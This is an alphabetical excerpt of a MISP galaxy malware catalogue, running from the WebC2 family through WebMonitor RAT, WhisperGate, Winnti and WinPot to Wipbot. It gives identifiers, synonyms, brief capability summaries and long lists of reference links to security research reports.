- https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf - webarchive
- https://blog.sekoia.io/bluenoroffs-rustbucket-campaign/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WebC2-AdSpace
Internal MISP references
UUID e57c677f-0117-4e23-8c3f-a772ed809f4c
which can be used as unique global reference for WebC2-AdSpace
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WebC2-Ausov
Internal MISP references
UUID 64f5ae85-1324-43de-ba3a-063785567be0
which can be used as unique global reference for WebC2-Ausov
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WebC2-Bolid
Internal MISP references
UUID 71292a08-9a7b-4df1-b1fd-7d80a8fcc18f
which can be used as unique global reference for WebC2-Bolid
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WebC2-Cson
Internal MISP references
UUID 5371bc44-dc07-4992-a3d7-c21705c50ac4
which can be used as unique global reference for WebC2-Cson
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WebC2-DIV
Internal MISP references
UUID acdda3e5-e776-419b-b060-14f3406de061
which can be used as unique global reference for WebC2-DIV
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WebC2-GreenCat
Internal MISP references
UUID cfed10ed-6601-469e-a1df-2d561b031244
which can be used as unique global reference for WebC2-GreenCat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WebC2-Head
Internal MISP references
UUID f9f37707-36cf-4ad0-88e0-86f47cbe0ed6
which can be used as unique global reference for WebC2-Head
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WebC2-Kt3
Internal MISP references
UUID 15094548-7555-43ee-8c0d-4557d6d8a087
which can be used as unique global reference for WebC2-Kt3
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WebC2-Qbp
Internal MISP references
UUID 71d8ef43-3767-494b-afaa-f58aad70df65
which can be used as unique global reference for WebC2-Qbp
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WebC2-Rave
Internal MISP references
UUID 5350bf3a-26b0-49fb-a0b8-dd68933ea78c
which can be used as unique global reference for WebC2-Rave
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WebC2-Table
Internal MISP references
UUID 1035ea6f-6743-4e69-861c-454c19ec96ae
which can be used as unique global reference for WebC2-Table
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WebC2-UGX
Internal MISP references
UUID b459033c-2d19-49aa-a21f-44a01d1a4156
which can be used as unique global reference for WebC2-UGX
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WebC2-Yahoo
Internal MISP references
UUID 52c1518d-175c-4b39-bc7c-353d2ddf382e
which can be used as unique global reference for WebC2-Yahoo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WebMonitor RAT
On its website, Webmonitor RAT is described as 'a very powerful, user-friendly, easy-to-setup and state-of-the-art monitoring tool. Webmonitor is a fully native RAT, meaning it will run on all Windows versions and languages starting from Windows XP and up, and perfectly compatible with all crypters and protectors.' Unit42 notes in their analysis that it is offered as C2-as-a-service and raises the controversial aspect that the builder allows creating client binaries that will not show any popup or dialogue during installation or while running on a target system.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WebMonitor RAT.
Known Synonyms |
---|
RevCode |
Internal MISP references
UUID fa3d196b-b757-49b7-a06d-77c77ac151c4
which can be used as unique global reference for WebMonitor RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor - webarchive
- https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/ - webarchive
- https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/ - webarchive
- https://revcode.se/product/webmonitor/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-actors-target-comm-apps-such-as-zoom-slack-discord - webarchive
- https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WeControl
Internal MISP references
UUID 541720a8-a125-4277-b109-c04e475c4cc3
which can be used as unique global reference for WeControl
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WellMess
WellMess is a Remote Access Trojan written in Go and .NET. It has hard-coded User-Agents. Attackers deploy WellMess using separate tools which also allow lateral movement, for example "gost". Command and Control traffic is handled via HTTP using the Set-Cookie field and the message body.
Internal MISP references
UUID d84ebd91-58f6-459f-96a1-d028a1719914
which can be used as unique global reference for WellMess
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf - webarchive
- https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf - webarchive
- https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf - webarchive
- https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf - webarchive
- https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html - webarchive
- https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html - webarchive
- https://blog.talosintelligence.com/2020/08/attribution-puzzle.html - webarchive
- https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-116a - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://community.riskiq.com/article/541a465f/description - webarchive
- https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf - webarchive
- https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://censys.com/advanced-persistent-infrastructure-tracking/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WeSteal
Internal MISP references
UUID 8ec2d984-8c10-49f2-ad97-64af275a7afc
which can be used as unique global reference for WeSteal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WhiskerSpy
Internal MISP references
UUID 821b2c61-31b0-41f5-b604-e58678bf287b
which can be used as unique global reference for WhiskerSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WhisperGate
Destructive malware deployed against targets in Ukraine in January 2022.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WhisperGate.
Known Synonyms |
---|
PAYWIPE |
Internal MISP references
UUID 6001ed9f-9108-4481-9980-dc6e5c1908a0
which can be used as unique global reference for WhisperGate
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.whispergate - webarchive
- https://www.brighttalk.com/webcast/15591/534324 - webarchive
- https://cert.gov.ua/article/18101 - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-057a - webarchive
- https://www.cadosecurity.com/resources-for-dfir-professionals-responding-to-whispergate-malware/ - webarchive
- https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf - webarchive
- https://www.secureworks.com/blog/whispergate-not-notpetya - webarchive
- https://www.youtube.com/watch?v=Ek3URIaC5O8 - webarchive
- https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf - webarchive
- https://stairwell.com/news/whispers-in-the-noise-microsoft-ukraine-whispergate/ - webarchive
- https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa/ - webarchive
- https://www.youtube.com/watch?v=mrTdSdMMgnk - webarchive
- https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/ - webarchive
- https://twitter.com/HuskyHacksMK/status/1482876242047258628 - webarchive
- https://www.crowdstrike.com/blog/who-is-ember-bear/ - webarchive
- https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/ - webarchive
- https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview - webarchive
- https://blogs.microsoft.com/on-the-issues/2022/01/15/mstic-malware-cyberattacks-ukraine-government/ - webarchive
- https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/ - webarchive
- https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html - webarchive
- https://twitter.com/knight0x07/status/1483401072102502400 - webarchive
- https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/ - webarchive
- https://www.crowdstrike.com/blog/how-crowdstrike-protects-against-data-wiping-malware/ - webarchive
- https://www.youtube.com/watch?v=2nd-f1dIfD4 - webarchive
- https://www.elastic.co/fr/security-labs/operation-bleeding-bear - webarchive
- https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/ - webarchive
- https://blogs.blackberry.com/en/2022/01/threat-thursday-whispergate-wiper - webarchive
- https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/ - webarchive
- https://maxkersten.nl/binary-analysis-course/malware-analysis/dumping-whispergates-wiper-from-an-eazfuscator-obfuscated-loader/ - webarchive
- https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html - webarchive
- https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/ - webarchive
- https://blog.gigamon.com/2022/01/28/focusing-on-left-of-boom/ - webarchive
- https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3 - webarchive
- https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat - webarchive
- https://go.recordedfuture.com/hubfs/reports/pov-2022-0127.pdf - webarchive
- https://www.netskope.com/blog/netskope-threat-coverage-whispergate - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf - webarchive
- https://www.secureworks.com/blog/disruptive-attacks-in-ukraine-likely-linked-to-escalating-tensions - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/update-on-whispergate-destructive-malware-targeting-ukraine.html - webarchive
- https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine - webarchive
- https://thehackernews.com/2022/02/putin-warns-russian-critical.html - webarchive
- https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/ - webarchive
- https://inquest.net/blog/2022/02/10/380-glowspark - webarchive
- https://blogs.blackberry.com/en/2022/02/threat-spotlight-whispergate-wiper-wreaks-havoc-in-ukraine - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd - webarchive
- https://twitter.com/nunohaien/status/1484088885575622657 - webarchive
- https://twitter.com/Libranalysis/status/1483128221956808704 - webarchive
- https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html - webarchive
- https://rxored.github.io/post/analysis/whispergate/whispergate/ - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/return-of-pseudo-ransomware.html - webarchive
- https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator.md - webarchive
- https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation - webarchive
- https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/ruinousursa/ - webarchive
- https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ - webarchive
- https://www.recordedfuture.com/whispergate-malware-corrupts-computers-ukraine/ - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord? - webarchive
- https://info.cyborgsecurity.com/hubfs/Emerging%20Threats/WhisperGate%20Malware%20Update%20-%20Emerging%20Threat.pdf - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/ - webarchive
- https://csirt-mon.wp.mil.pl/pl/articles6-aktualnosci/analysis-cyberattack-ukrainian-government-resources/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/ - webarchive
- https://lifars.com/2022/01/a-detailed-analysis-of-whispergate-targeting-ukrainian-organizations/ - webarchive
- https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html?splunk - webarchive
- https://zetter.substack.com/p/dozens-of-computers-in-ukraine-wiped - webarchive
- https://www.crowdstrike.com/blog/lessons-from-past-cyber-operations-against-ukraine/ - webarchive
- https://zetter.substack.com/p/hackers-were-in-ukraine-systems-months - webarchive
- https://github.com/OALabs/Lab-Notes/blob/main/WhisperGate/WhisperGate.ipynb - webarchive
- https://intel471.com/blog/russia-ukraine-conflict-cybercrime-underground - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WhiteBird
According to Dr.Web, WhiteBird is a backdoor written in C++ and designed to operate in both 32-bit and 64-bit Microsoft Windows operating systems. The configuration is encrypted with a single byte XOR key. An interesting feature is that the malware can be restricted to operate only within certain "working_hours" with a granularity of one minute.
Internal MISP references
UUID 20286294-3813-4c17-a165-ef12aae64303
which can be used as unique global reference for WhiteBird
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird - webarchive
- https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf - webarchive
- https://st.drweb.com/static/new-www/news/2020/september/tek_rf_article_en.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WhiteBlackCrypt
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WhiteBlackCrypt.
Known Synonyms |
---|
WARYLOOK |
Internal MISP references
UUID f587a5a2-907e-456c-91e9-74fd997c03b5
which can be used as unique global reference for WhiteBlackCrypt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WhiteSnake Stealer
WhiteSnake Stealer, discovered in February 2022, is a sophisticated .NET data-stealing malware that targets browsers, applications, and crypto wallets.
The builder can produce payloads in different file formats such as EXE, SCR, COM, CMD, BAT, VBS, PIF, WSF, HTA, MSI, PY, DOC, DOCM, XLS, XLL, XLSM. Some of these (Python, Bash) allow the malware to run on Linux systems.
The stealer has two execution methods:
- Non-resident - the stealer deletes itself after successful execution
- Resident - the stealer beacons out to the C2 (possibly in the Tor network)
WhiteSnake Stealer can gather system information, execute remote commands, spread through USB drives, and perform tasks like keylogging, file management, and webcam access.
Internal MISP references
UUID 8f5bb3ec-a764-4ef4-a113-532a3d4b82c4
which can be used as unique global reference for WhiteSnake Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.whitesnake - webarchive
- https://news.drweb.com/show/?i=14823&lng=en&c=5 - webarchive
- https://www.infinitumit.com.tr/en/white-snake-stealer-report/ - webarchive
- https://russianpanda.com/2023/07/04/WhiteSnake-Stealer-Malware-Analysis/ - webarchive
- https://bazaar.abuse.ch/sample/5066eca9c7309af16c882ffae79ceee93d5c8a8bcfe3726455c9b5589a492553/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WikiLoader
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WikiLoader.
Known Synonyms |
---|
WailingCrab |
Internal MISP references
UUID 8dd43a3f-320a-4bdd-8379-b592cd6efc1f
which can be used as unique global reference for WikiLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.wikiloader - webarchive
- https://github.com/VenzoV/MalwareAnalysisReports/blob/main/WikiLoader/WikiLoader%20Shellcode%20pt3.md - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/out-sandbox-wikiloader-digs-sophisticated-evasion - webarchive
- https://github.com/VenzoV/MalwareAnalysisReports/blob/main/WikiLoader/WikiLoader%20notepad.md - webarchive
- https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/ - webarchive
- https://github.com/VenzoV/MalwareAnalysisReports/blob/main/WikiLoader/WikiLoader%20Shellcode%20pt2.md - webarchive
- https://twitter.com/JAMESWT_MHT/status/1712783250446328114?t=iLKXzsZuS1TTa0i9sZFkQA&s=19 - webarchive
- https://twitter.com/threatinsight/status/1679864625544978432 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WildFire
Internal MISP references
UUID 2f512a73-6847-4231-81c6-8b51af8b5be2
which can be used as unique global reference for WildFire
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WinDealer
Information stealer used by threat actor LuoYu.
Internal MISP references
UUID 3aa42316-9f3b-457b-9560-99ccf00a45c1
which can be used as unique global reference for WinDealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.windealer - webarchive
- https://mssplab.github.io/threat-hunting/2023/05/08/malware-analysis-windealer.html - webarchive
- https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_7_leon-niwa-ishimaru_en.pdf - webarchive
- https://cocomelonc.github.io/book/2023/12/13/malwild-book.html - webarchive
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf - webarchive
- https://blogs.blackberry.com/en/2022/06/threat-thursday-china-based-apt-plays-auto-updater-card-to-deliver-windealer-malware - webarchive
- https://blogs.jpcert.or.jp/en/2021/10/windealer.html - webarchive
- https://securelist.com/windealer-dealing-on-the-side/105946 - webarchive
- https://securelist.com/windealer-dealing-on-the-side/105946/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WINELOADER
Internal MISP references
UUID 3e0693b5-cbda-4dea-a7d5-768cc214ac0b
which can be used as unique global reference for WINELOADER
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.wineloader - webarchive
- https://twitter.com/SinghSoodeep/status/1763808104221737156 - webarchive
- https://twitter.com/greglesnewich/status/1762549311294804145 - webarchive
- https://www.binarydefense.com/resources/blog/wineloader-analysis-of-the-infection-chain/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2024-CTI-006.pdf - webarchive
- https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader - webarchive
- https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WinInetLoader
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WinInetLoader.
Known Synonyms |
---|
LIDSHOT |
Internal MISP references
UUID 5801591a-d6f1-45b1-8abd-718257dd2433
which can be used as unique global reference for WinInetLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
winlog
Internal MISP references
UUID 772099d0-b74a-4a73-9967-f1d40ab3ac92
which can be used as unique global reference for winlog
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WinMM
Internal MISP references
UUID 6a100902-7204-4f20-b838-545ed86d4428
which can be used as unique global reference for WinMM
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm - webarchive
- https://securelist.com/analysis/publications/69953/the-naikon-apt/ - webarchive
- https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Winnti (Windows)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Winnti (Windows).
Known Synonyms |
---|
BleDoor |
JUMPALL |
Pasteboy |
RbDoor |
Internal MISP references
UUID 7f8166e2-c7f4-4b48-a07b-681b61a8f2c1
which can be used as unique global reference for Winnti (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti - webarchive
- https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html - webarchive
- https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf - webarchive
- https://www.carbonblack.com/2020/02/20/threat-analysis-active-c2-discovery-using-protocol-emulation-part2-winnti-4-0/ - webarchive
- https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf - webarchive
- https://www.lastline.com/labsblog/helo-winnti-attack-scan/ - webarchive
- https://github.com/TKCERT/winnti-nmap-script - webarchive
- https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf - webarchive
- https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf - webarchive
- https://github.com/TKCERT/winnti-suricata-lua - webarchive
- http://web.br.de/interaktiv/winnti/english/ - webarchive
- https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/ - webarchive
- https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques - webarchive
- https://www.tagesschau.de/investigativ/ndr/hackerangriff-chemieunternehmen-101.html - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
- https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0921.pdf - webarchive
- https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage - webarchive
- https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive - webarchive
- https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf - webarchive
- https://securelist.com/games-are-over/70991/ - webarchive
- https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/ - webarchive
- https://www.youtube.com/watch?v=_fstHQSK-kk - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://docplayer.net/162112338-Don-t-miss-the-forest-for-the-trees-gleaning-hunting-value-from-too-much-intrusion-data.html - webarchive
- https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/ - webarchive
- https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/ - webarchive
- https://blogs.vmware.com/security/2021/11/monitoring-winnti-4-0-c2-servers-for-two-years.html - webarchive
- https://content.fireeye.com/apt-41/rpt-apt41/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf - webarchive
- https://content.fireeye.com/api/pdfproxy?id=86840 - webarchive
- https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/ - webarchive
- https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/ - webarchive
- https://github.com/br-data/2019-winnti-analyse/ - webarchive
- https://www.recordedfuture.com/blog/china-linked-tag-28-targets-indias-the-times-group - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-atlas - webarchive
- https://www.youtube.com/watch?v=YCwyc6SctYs - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2021/01/emulation-of-kernel-mode-rootkits-with-speakeasy.html - webarchive
- https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/ - webarchive
- https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/ - webarchive
- https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/ - webarchive
- https://www.youtube.com/watch?v=qk9XLDBLPXg - webarchive
- http://2015.ruxcon.org.au/assets/2015/slides/Ruxcon%202015%20-%20McCormack.pdf - webarchive
- https://harfanglab.io/en/insidethelab/isoon-leak-analysis/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf - webarchive
- https://github.com/TKCERT/winnti-detector - webarchive
- https://github.com/superkhung/winnti-sniff - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WinorDLL64
According to ESET Research, this is a payload downloaded by win.wslink. They attribute it with low confidence to Lazarus.
Internal MISP references
UUID 64f7f940-db4c-4569-869b-d282dadf55ac
which can be used as unique global reference for WinorDLL64
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WinPot
WinPot is designed to make ATMs from a popular ATM vendor automatically dispense all cash from their most valuable cassettes.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WinPot.
Known Synonyms |
---|
ATMPot |
Internal MISP references
UUID 893a1da2-ae35-4877-8cde-3f532543af36
which can be used as unique global reference for WinPot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot - webarchive
- https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/ - webarchive
- https://securelist.com/atm-robber-winpot/89611/ - webarchive
- https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WinScreeny
Backdoor used in the EvilPlayout campaign against Iran's State Broadcaster.
Internal MISP references
UUID b45a1776-11a8-4ac9-9714-33cb17709166
which can be used as unique global reference for WinScreeny
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Winsloader
Internal MISP references
UUID db755407-4135-414c-90e3-97f5e48c6065
which can be used as unique global reference for Winsloader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Wipbot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Wipbot.
Known Synonyms |
---|
Epic |
Tavdig |
Internal MISP references
UUID 6b6cf608-cc2c-40d7-8500-afca3e35e7e4
which can be used as unique global reference for Wipbot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot - webarchive
